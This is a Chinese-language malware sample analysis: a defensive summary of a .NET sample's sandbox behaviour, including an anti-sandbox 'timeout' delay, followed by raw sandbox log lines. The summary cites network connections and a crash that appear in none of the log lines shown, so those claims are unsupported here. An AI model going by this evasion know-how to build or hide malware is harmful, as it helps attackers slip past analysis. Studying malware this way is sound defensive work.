样本分析 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb

 

https://s.threatbook.com/report/file/99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb

行为日志要点（以下结论均取自下方沙箱日志；日志未直接给出的内容已标注为推测）：

1. 样本是 32 位 .NET Framework 4.x 程序：加载的是 NativeImages_v4.0.30319_32 下的 mscorlib/System/System.Core/System.Xml/System.Configuration/System.Windows.Forms/System.Drawing/Accessibility，子进程也走 SysWOW64；主模块镜像仅 0xA000 字节（约 40 KB）。
2. 启动后依次读取 Desktop/Documents/Music/Pictures/Videos/Downloads/OneDrive 下的 desktop.ini，可能是在枚举用户目录；随后向 HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 写入 ProxyBypass=1、IntranetName=1、UNCAsIntranet=1、AutoDetect=0（REG_DWORD，各写了两次）。这组键通常由 WinINet/.NET 在发起 HTTP 请求前初始化代理设置时写入，单独看属于弱指标，不宜直接作为恶意判定依据。
3. 执行 cmd.exe /c timeout 4.769 做延时（常见的反沙箱/错开时序手法）。注意 timeout.exe 创建后约 16 ms 即退出（09:07:41:952 → 09:07:41:968），而 timeout 只接受整数秒，推测小数参数被拒绝、延时并未真正生效。
4. 之后向 104.18.19.73:443 与 104.18.18.73:443 发起 TCP 连接（相隔约 1 秒）。104.18.x.x 一般认为属于 Cloudflare 地址段（104.16.0.0/13），IP 本身不适合作为 IOC，应以域名/SNI 为准——本日志未记录，需结合上方 ThreatBook 报告或抓包确认。
5. 第二次连接约 1 秒后，进程开始查找 System.resources/mscorlib.resources（异常消息资源），紧接着拉起 WerFault.exe -u -p 4092 -s 1904，并在 C:\ProgramData\Microsoft\Windows\WER\Temp\ 下写入 WER8DF3.tmp.dmp。即样本因未处理异常崩溃退出；本次运行未观察到文件落地、持久化或后续阶段行为，分析结论只能覆盖崩溃之前的部分。该 dmp 可用于查看崩溃时的进程内存（包括尚未释放的网络缓冲区/字符串）。

检测侧可关注的进程链：<样本>.exe → cmd.exe /c timeout N → timeout.exe，紧随其后同一进程对 443 端口的外联，以及 WerFault.exe -p <样本 PID>。

09:07:41:671,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   EXEC_create,    C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,  parent_pid:7920 cmdline:'C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe' image_base:0x0000000000610000 image_size:0x0000A000 ,   0x00000000 [操作成功完成。  ],
09:07:41:686,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\Microsoft.NET\Framework, filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:702,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,    offset:0x00000000 datalen:0x00000FFF ,  0x00000000 [操作成功完成。  ],
09:07:41:702,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib,    filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:702,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll.aux,   offset:0x00000000 datalen:0x000000B0 ,  0x00000000 [操作成功完成。  ],
09:07:41:702,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   EXEC_module_load,   C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll,   base:0x0000000071D60000 size:0x0140E000 ,   0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,    offset:0x00000000 datalen:0x00000FFF ,  0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll.aux,   offset:0x00000000 datalen:0x0000026C ,  0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   EXEC_module_load,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll,   base:0x0000000071270000 size:0x00A55000 ,   0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration,    filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll.aux,   offset:0x00000000 datalen:0x00000360 ,  0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core, filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll.aux, offset:0x00000000 datalen:0x00000384 ,  0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   EXEC_module_load,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll, base:0x0000000070A50000 size:0x00818000 ,   0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   EXEC_module_load,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll,   base:0x0000000070940000 size:0x00106000 ,   0x00000000 [操作成功完成。  ],
09:07:41:719,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:734,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll.aux,   offset:0x00000000 datalen:0x000002EC ,  0x00000000 [操作成功完成。  ],
09:07:41:734,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   EXEC_module_load,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll,   base:0x000000006E430000 size:0x00774000 ,   0x00000000 [操作成功完成。  ],
09:07:41:734,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,    offset:0x00000000 datalen:0x00000FFF ,  0x00000000 [操作成功完成。  ],
09:07:41:734,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,    offset:0x00000000 datalen:0x00001000 ,  0x00000000 [操作成功完成。  ],
09:07:41:749,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms,    filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:749,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\37c31fb353175d6efd4ca9dc426cab68\System.Windows.Forms.ni.dll.aux,   offset:0x00000000 datalen:0x000006B8 ,  0x00000000 [操作成功完成。  ],
09:07:41:749,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\59978a45568399ef08cfe99da6a725bb\System.Windows.Forms.ni.dll.aux,   offset:0x00000000 datalen:0x000006B8 ,  0x00000000 [操作成功完成。  ],
09:07:41:749,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms,    filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:749,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\37c31fb353175d6efd4ca9dc426cab68\System.Windows.Forms.ni.dll.aux,   offset:0x00000000 datalen:0x000006B8 ,  0x00000000 [操作成功完成。  ],
09:07:41:749,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\59978a45568399ef08cfe99da6a725bb\System.Windows.Forms.ni.dll.aux,   offset:0x00000000 datalen:0x000006B8 ,  0x00000000 [操作成功完成。  ],
09:07:41:796,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   FILE_read,  C:\Users\bonelee\Desktop\desktop.ini,   offset:0x00000000 datalen:0x0000011C ,  0x00000000 [操作成功完成。  ],
09:07:41:796,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   FILE_read,  C:\Users\bonelee\Documents\desktop.ini, offset:0x00000000 datalen:0x00000194 ,  0x00000000 [操作成功完成。  ],
09:07:41:796,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   FILE_read,  C:\Users\bonelee\Music\desktop.ini, offset:0x00000000 datalen:0x000001FA ,  0x00000000 [操作成功完成。  ],
09:07:41:811,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   FILE_read,  C:\Users\bonelee\Pictures\desktop.ini,  offset:0x00000000 datalen:0x000001FA ,  0x00000000 [操作成功完成。  ],
09:07:41:811,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   FILE_read,  C:\Users\bonelee\Videos\desktop.ini,    offset:0x00000000 datalen:0x000001FA ,  0x00000000 [操作成功完成。  ],
09:07:41:811,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   FILE_read,  C:\Users\bonelee\Downloads\desktop.ini, offset:0x00000000 datalen:0x0000011C ,  0x00000000 [操作成功完成。  ],
09:07:41:811,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   FILE_read,  C:\Users\bonelee\OneDrive\desktop.ini,  offset:0x00000000 datalen:0x00000064 ,  0x00000000 [操作成功完成。  ],
09:07:41:827,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,   type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:41:827,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,  type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:41:827,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:41:827,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,    type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:41:827,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,   type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:41:827,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,  type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:41:827,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:41:827,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,    type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:41:858,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:8504,  4092,   FILE_read,  C:\Windows\SysWOW64\cmd.exe,    offset:0x00000000 datalen:0x00039A00 ,  0x00000000 [操作成功完成。  ],
09:07:41:858,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   PROC_exec,  C:\Windows\SysWOW64\cmd.exe,    target_pid:6308 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' ,  0x00000000 [操作成功完成。  ],
09:07:41:858,   cmd.exe,    6308:0, 4092,   EXEC_create,    C:\Windows\SysWOW64\cmd.exe,    parent_pid:4092 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' image_base:0x0000000000FE0000 image_size:0x00059000 ,  0x00000000 [操作成功完成。  ],
09:07:41:858,   cmd.exe,    6308:5100,  4092,   FILE_read,  C:\Windows\System32\conhost.exe,    offset:0x00000000 datalen:0x000C8C00 ,  0x00000000 [操作成功完成。  ],
09:07:41:858,   cmd.exe,    6308:0, 4092,   PROC_exec,  C:\Windows\System32\conhost.exe,    target_pid:6580 cmdline:'\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1' , 0x00000000 [操作成功完成。  ],
09:07:41:858,   cmd.exe,    6308:5100,  4092,   REG_setval, HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-2451103786-187343032-3810694054-1000\\Device\HarddiskVolume3\Windows\System32\conhost.exe, type:0x00000003 datalen:24 data:'C9 2F 5F 60 DE DA D9 01 00 00 00 00 00 00 00 00 ' ,    0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:0, 4092,   EXEC_create,    C:\Windows\System32\conhost.exe,    parent_pid:6308 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' image_base:0x00007FF6131A0000 image_size:0x000D1000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:5780,  4092,   FILE_read,  C:\Windows\Prefetch\CONHOST.EXE-0C6456FB.pf,    offset:0x00000000 datalen:0x00001E40 ,  0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\ntdll.dll,  attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\conhost.exe,    attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\kernel32.dll,   attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\KernelBase.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\locale.nls, attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\msvcp_win.dll,  attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\ucrtbase.dll,   attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\SHCore.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\msvcrt.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\rpcrt4.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\combase.dll,    attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\bcryptprimitives.dll,   attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\advapi32.dll,   attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\sechost.dll,    attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\user32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\win32u.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\gdi32.dll,  attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\gdi32full.dll,  attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\imm32.dll,  attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\Conhost.exe.mui,    attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\shell32.dll,    attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\cfgmgr32.dll,   attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\windows.storage.dll,    attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\profapi.dll,    attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\powrprof.dll,   attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\shlwapi.dll,    attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\kernel.appcore.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\cryptsp.dll,    attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:858,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\Globalization\Sorting\SortDefault.nls,   attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:874,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\user32.dll.mui, attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:874,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\msctf.dll,  attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:874,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\oleaut32.dll,   attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:874,   conhost.exe,    6580:232,   4092,   FILE_chmod, C:\Windows\System32\ole32.dll,  attrib:0x00000000 , 0x00000000 [操作成功完成。  ],
09:07:41:921,   conhost.exe,    6580:7656,  4092,   FILE_read,  C:\Windows\Fonts\StaticCache.dat,   offset:0x00000000 datalen:0x0000003C ,  0x00000000 [操作成功完成。  ],
09:07:41:936,   conhost.exe,    6580:0, 4092,   EXEC_module_load,   C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_05b6437c071e554b\comctl32.dll,    base:0x00007FFA14440000 size:0x00279000 ,   0x00000000 [操作成功完成。  ],
09:07:41:936,   cmd.exe,    6308:5100,  4092,   FILE_read,  C:\Windows\SysWOW64\timeout.exe,    offset:0x00000000 datalen:0x00006200 ,  0x00000000 [操作成功完成。  ],
09:07:41:936,   cmd.exe,    6308:0, 4092,   PROC_exec,  C:\Windows\SysWOW64\timeout.exe,    target_pid:8672 cmdline:'timeout  4.769' ,  0x00000000 [操作成功完成。  ],
09:07:41:952,   timeout.exe,    8672:0, 4092,   EXEC_create,    C:\Windows\SysWOW64\timeout.exe,    parent_pid:6308 cmdline:'timeout  4.769' image_base:0x0000000000020000 image_size:0x0000A000 ,  0x00000000 [操作成功完成。  ],
09:07:41:968,   timeout.exe,    8672:0, 4092,   EXEC_destroy,   C:\Windows\SysWOW64\timeout.exe,    parent_pid:6308 cmdline:'timeout  4.769' ,  0x00000000 [操作成功完成。  ],
09:07:41:968,   cmd.exe,    6308:0, 4092,   EXEC_destroy,   C:\Windows\SysWOW64\cmd.exe,    parent_pid:4092 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' ,  0x00000000 [操作成功完成。  ],
09:07:41:968,   conhost.exe,    6580:0, 4092,   EXEC_destroy,   C:\Windows\System32\conhost.exe,    parent_pid:6308 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' , 0x00000000 [操作成功完成。  ],
09:07:41:968,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:968,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\167c4b04ac34ab24a58f841c21862a3e\System.Drawing.ni.dll.aux,   offset:0x00000000 datalen:0x00000248 ,  0x00000000 [操作成功完成。  ],
09:07:41:968,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\67e34187cff6cf0d7e49a0b354229d26\System.Drawing.ni.dll.aux,   offset:0x00000000 datalen:0x00000248 ,  0x00000000 [操作成功完成。  ],
09:07:41:968,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:41:968,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\167c4b04ac34ab24a58f841c21862a3e\System.Drawing.ni.dll.aux,   offset:0x00000000 datalen:0x00000248 ,  0x00000000 [操作成功完成。  ],
09:07:41:968,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\67e34187cff6cf0d7e49a0b354229d26\System.Drawing.ni.dll.aux,   offset:0x00000000 datalen:0x00000248 ,  0x00000000 [操作成功完成。  ],
09:07:42:046,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   EXEC_module_load,   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll, base:0x000000006FF10000 size:0x0008E000 ,   0x00000000 [操作成功完成。  ],
09:07:42:061,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility,   filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:42:061,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\bac1ef140124369de2a7efb857ab6349\Accessibility.ni.dll.aux, offset:0x00000000 datalen:0x0000012C ,  0x00000000 [操作成功完成。  ],
09:07:42:061,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\e3c0ae9a32f7a39d7afc41a8aa847174\Accessibility.ni.dll.aux, offset:0x00000000 datalen:0x0000012C ,  0x00000000 [操作成功完成。  ],
